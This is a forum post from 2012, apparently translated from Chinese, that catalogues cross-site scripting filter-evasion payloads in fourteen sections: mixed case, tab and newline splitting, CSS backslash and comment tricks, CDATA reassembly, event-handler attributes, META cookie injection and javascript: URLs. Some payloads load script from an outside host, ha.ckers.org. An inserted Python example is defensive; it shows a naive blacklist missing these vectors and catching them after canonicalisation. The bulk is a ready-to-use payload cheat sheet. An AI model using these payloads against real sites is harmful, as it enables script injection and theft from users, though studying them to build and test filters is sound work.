Introduction to Cross Site Scripting (XSS) Attack Techniques

[复制链接]
跳转到指定楼层
楼主
Posted on 2012-12-31 09:59:28
1. Change the case of characters

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use an extension other than .js

    <script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert other characters into the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> new line

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        Original source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        Original source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

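The tricks in sections 1, 6 and 7 all target filters that match literal strings against the raw input. As an added example, not part of the original post, the following Python shows a three-pattern blacklist (the patterns are assumed for illustration) missing those payloads and then catching them once the input is canonicalised the way a browser would interpret it: lowercased, CSS comments and backslash escapes resolved, tab/LF/CR/NUL removed. The sample strings are constructed from the post's own vectors.

```python
import re

# Constructed test inputs: the evasion vectors quoted in sections 1, 6 and 7 of the
# post, with the tab, newline and backslash characters written out explicitly, plus
# one benign line that mentions "javascript" without being a script.
SAMPLES = {
    "mixed_case":    "<sCript>alert('d')</scRipT>",
    "tab_newline":   "<img src=\"jav\tascr\nipt:alert('XSS3')\">",
    "css_backslash": "<IMG STYLE='xss:expre\\ssion(alert(\"XSS33\"))'>",
    "css_comment":   "<IMG STYLE=\"xss:expr/*anyword*/ession(alert('sss'))\">",
    "benign":        "<img src=\"/static/logo.png\" alt=\"javascript tutorial\">",
}

# The kind of literal, case-sensitive blacklist the post's tricks are aimed at
# (assumed patterns, for illustration only).
PATTERNS = [re.compile(p) for p in (r"<script", r"javascript:", r"expression\(")]

def naive_filter_flags(html: str) -> bool:
    """Apply the blacklist to the raw input, as a naive filter would."""
    return any(p.search(html) for p in PATTERNS)

def _css_unescape(m: re.Match) -> str:
    """CSS escape semantics: \\HH..H (1-6 hex digits, optional trailing space)
    denotes a code point; any other \\X is the literal character X."""
    esc = m.group(1)
    if re.fullmatch(r"[0-9a-f]{1,6}\s?", esc):
        code = int(esc.strip(), 16)
        return chr(code) if code <= 0x10FFFF else "\ufffd"
    return esc

def canonicalize(html: str) -> str:
    """Undo the obfuscations the post lists so the same blacklist matches again:
    section 1 (case changes), section 6 (tab/newline inside 'javascript:', which
    browsers ignore in a URL scheme), section 7 (CSS backslash escapes and /* */
    comments). Detection-side normalisation only; never emit this string."""
    s = html.lower()
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)             # CSS comments
    s = re.sub(r"\\([0-9a-f]{1,6}\s?|.)", _css_unescape, s)  # CSS backslash escapes
    s = re.sub(r"[\t\n\r\x00]", "", s)                       # tab, LF, CR, NUL
    return s

def canonical_filter_flags(html: str) -> bool:
    """Same blacklist, applied after canonicalisation."""
    return any(p.search(canonicalize(html)) for p in PATTERNS)

def compare() -> dict:
    """Per sample: (flagged by the naive filter, flagged after canonicalisation)."""
    return {k: (naive_filter_flags(v), canonical_filter_flags(v)) for k, v in SAMPLES.items()}

if __name__ == "__main__":
    for name, (naive, canon) in compare().items():
        print(f"{name:14s} naive={naive!s:5s} canonical={canon}")
```

Canonicalisation closes these particular gaps but does not make a blacklist complete; contextual output encoding and an allowlist-based sanitiser remain the primary defence.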
9. Script in an HTML tag

    <body onload="alert('onload')">

        Event-handler attributes that can carry it: onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in an SWF

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code apart and reassemble it.

    <XML ID=I><X><C>

    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

    </C></X>

    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

    <HTML><BODY>

    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

    <?import namespace="t" implementation="#default#time2">

    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">

    </BODY></HTML>

13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript: in src, href and url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}

    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
